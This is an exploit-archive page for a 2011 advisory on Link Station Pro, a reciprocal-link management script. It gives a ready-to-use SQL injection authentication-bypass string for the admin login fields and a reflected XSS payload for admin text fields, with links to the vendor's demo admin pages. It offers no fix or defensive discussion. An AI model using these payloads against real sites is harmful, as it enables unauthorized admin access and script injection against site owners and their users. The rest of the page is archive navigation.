Link Station Pro SQL Injection / Cross Site Scripting

Link Station Pro SQL Injection / Cross Site Scripting: Posted Jul 30, 2011; Authored by r007k17-w; Link Station Pro suffers from cross site scripting and remote SQL injection vulnerabilities. The SQL injection vulnerability allows for authentication bypass.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | af6a8e253f03e46cdce73f0204bfe883d6c68700b467b7d4fa19ab3006bd297b; Download | Favorite | View

Link Station Pro SQL Injection / Cross Site Scripting

                                              %+
$.......#........4.........|)........0............\/\/       %+


                                              %+
                                                       %+


%++++++++++++++++++++++++++++++++++++++++


# Exploit Title: Link Station Pro Multiple Vulnerabilities
# Vendor:  www.linkstationpro.com
# Date: 28th july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork:  © 2011 Copyright SteveDawson.com
*****************************************************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
 Link Station Pro is without doubt, the most efficient, easiest and most
configurable reciprocal link management tool available for all your
reciprocal link requirements.

******************************************************************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://www.linkstationpro.com/Partners/admindemo/index.php

EXPLOIT:
                 Username: ' or 'bug'='bug' #
                 Password: ' or 'bug'='bug' #
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.

Reflected XSS Vulnerability
********************************
EXPLOIT 2:  XSS Vulnerability in admin panel(in most of the text fields)

   {Demo}:
http://www.linkstationpro.com/Partners/admindemo/manage_categories.php
    Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
*****************************************************************************************************************************************************************************************

Top Authors In Last 30 Days

Red Hat 282 files
Jay Turla 150 files
indoushka 149 files
Ubuntu 69 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
Gentoo 31 files
H D Moore 31 files
Debian 30 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,059)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,725)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,806)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

Link Station Pro SQL Injection / Cross Site Scripting

Link Station Pro SQL Injection / Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Link Station Pro SQL Injection / Cross Site Scripting

Share This

Link Station Pro SQL Injection / Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems